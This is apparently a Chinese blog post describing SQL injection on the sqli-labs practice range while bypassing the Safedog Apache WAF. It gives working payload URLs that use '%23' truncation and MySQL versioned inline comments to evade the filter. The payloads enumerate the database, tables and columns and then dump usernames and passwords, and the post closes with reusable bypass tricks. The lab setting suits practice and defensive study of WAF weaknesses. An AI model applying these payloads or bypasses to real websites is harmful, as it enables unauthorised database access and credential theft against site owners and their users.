记一次SQL注入绕过安全狗

今天药忘吃喽~ 2023-10-10 22:43 23阅读 0赞

## 环境搭建 ##

phpstudy搭建Apache+php 下sqli-lib靶场。

网站安全狗Apache版本4.0

## 绕过思路 ##

正常注入思路：

> 1.  判断闭合字符
> 2.  判断注入类型
> 3.  查询列数
> 4.  判断回显位
> 5.  查询数据库的基本信息
> 6.  爆数据库名
> 7.  爆数据库表名
> 8.  爆字段名
> 9.  爆值

而常见的sql绕waf的方法有：

> 1.  大小写，
> 2.  加密解密
> 3.  编码解码
> 4.  等价函数
> 5.  特殊符号
> 6.  注释符混用

## 操作步骤 ##

1.以sqli第一关为例：首先判断闭合字符

![6dc96895a4fc42ce9c698acb6a008478.png][]

2.使用order by 判断列数 ，正常的语句被拦截，无法回显

![23cc38c43e9a4ed7960b860ab25f8b9d.png][]

3.使用内联注释尝试绕过waf，/\*! \*/会干扰waf进行检测数据

安全狗更新之后，所有的payload都已经失效，但是经过多次尝试后，发现“\#”字符有着特殊之处

> 我们的语句发送过去，首先接收安全狗检测，安全狗检测到'\#'号，所以'\\\#'后面的都会被截断抛弃，所以安全狗只能匹配到'\\\#'前的order，但是没匹配到'\\\#'后的by，最终导致语句不完整导致最后的报错。 \#的编码为%23

构造如下语句后，发现数据库没有读取到by 3，只读到了order的值

![c8b65342b15243dba724e37b10a97afd.png][]

尝试以下语句 ，页面正常，说明在构造语句前加“%23”可以绕过检测，并且判断出列数为三

或者使用另一种语句 group by 判断列数

http://192.168.249.131/sqli/Less-1/?id=1' "%23"/*!12444order */ %0a /*!12444by 3*/
    -- +

![363d960aa6574ee49f27722da29cfcea.png][]

4.接着判断显示位，通过前边尝试构造的语句，可以轻松构造payload，成功获得显示位2,3

注意 改为-1，或构造为假的条件（and 1=2）

![4f31de6b59c34b90a2ff9b9739d43b46.png][]

5.爆出数据库信息和版本

![42b30a57bf6c47bb843d144ead01614b.png][]

语句中带有database（），被拦截，但是database没有进行拦截，说明database和（）之间不能连用

![b9c207d9f25d4dd2b3ec234cb82c9bce.png][]

构造语句为
    http://192.168.249.131/sqli/Less-1/?id=-1'"%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),version(/*!12444*/)
    -- +

![77906aadb366459b877365ed5c53ee82.png][]

6.爆出数据库名后，尝试爆表名

http://192.168.249.131/sqli/Less-1/?id=-1'  "%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),group_concat(table_name) from information_schema.tables where table_schema="security"

![e63f82ca7e43469794e68c3af7ae23c8.png][]

7.接着尝试爆出users表下的字段值 ，构造语句后，发现被拦截，经过测试发现 and被过滤

尝试 /\*!12444and\*/

![dbd04cbd1446435b9e9d3491462ab0cb.png][]

http://192.168.249.131/sqli/Less-1/?id=-1'  "%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),group_concat(column_name) from information_schema.columns where table_schema="security" /*!12444and*/
     table_name="users"

![c2e1a5032cbf4a1992f1ee4cd2cc24af.png][]

8.接着就是爆出字段中的值了

http://192.168.249.131/sqli/Less-1/?id=-1'  "%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),group_concat(username,password) from users

![a1a74ff5d1f74421bb5f8fe6d5caf694.png][]

## 总结 ##

1、内联注释 可以绕过大多数情况

2、在一些被拦截的地方多用/\\\*%23\\\*/和/\\\*!*10440%0a*\\\*/，有奇效。

> %23为\#编码，%0A为换行
> 
> 一般来说，内联注释只有在紧跟版本号的情况下才有意义，其主要目的是通过版本号来控制部分语句在不同 MySQL 版本下的执行情况

绕过原因：安全狗误以为/\*\*/是注释的内容所以全部忽略。

[6dc96895a4fc42ce9c698acb6a008478.png]: https://img-blog.csdnimg.cn/6dc96895a4fc42ce9c698acb6a008478.png
[23cc38c43e9a4ed7960b860ab25f8b9d.png]: https://img-blog.csdnimg.cn/23cc38c43e9a4ed7960b860ab25f8b9d.png
[c8b65342b15243dba724e37b10a97afd.png]: https://img-blog.csdnimg.cn/c8b65342b15243dba724e37b10a97afd.png
[363d960aa6574ee49f27722da29cfcea.png]: https://img-blog.csdnimg.cn/363d960aa6574ee49f27722da29cfcea.png
[4f31de6b59c34b90a2ff9b9739d43b46.png]: https://img-blog.csdnimg.cn/4f31de6b59c34b90a2ff9b9739d43b46.png
[42b30a57bf6c47bb843d144ead01614b.png]: https://img-blog.csdnimg.cn/42b30a57bf6c47bb843d144ead01614b.png
[b9c207d9f25d4dd2b3ec234cb82c9bce.png]: https://img-blog.csdnimg.cn/b9c207d9f25d4dd2b3ec234cb82c9bce.png
[77906aadb366459b877365ed5c53ee82.png]: https://img-blog.csdnimg.cn/77906aadb366459b877365ed5c53ee82.png
[e63f82ca7e43469794e68c3af7ae23c8.png]: https://img-blog.csdnimg.cn/e63f82ca7e43469794e68c3af7ae23c8.png
[dbd04cbd1446435b9e9d3491462ab0cb.png]: https://img-blog.csdnimg.cn/dbd04cbd1446435b9e9d3491462ab0cb.png
[c2e1a5032cbf4a1992f1ee4cd2cc24af.png]: https://img-blog.csdnimg.cn/c2e1a5032cbf4a1992f1ee4cd2cc24af.png
[a1a74ff5d1f74421bb5f8fe6d5caf694.png]: https://img-blog.csdnimg.cn/a1a74ff5d1f74421bb5f8fe6d5caf694.png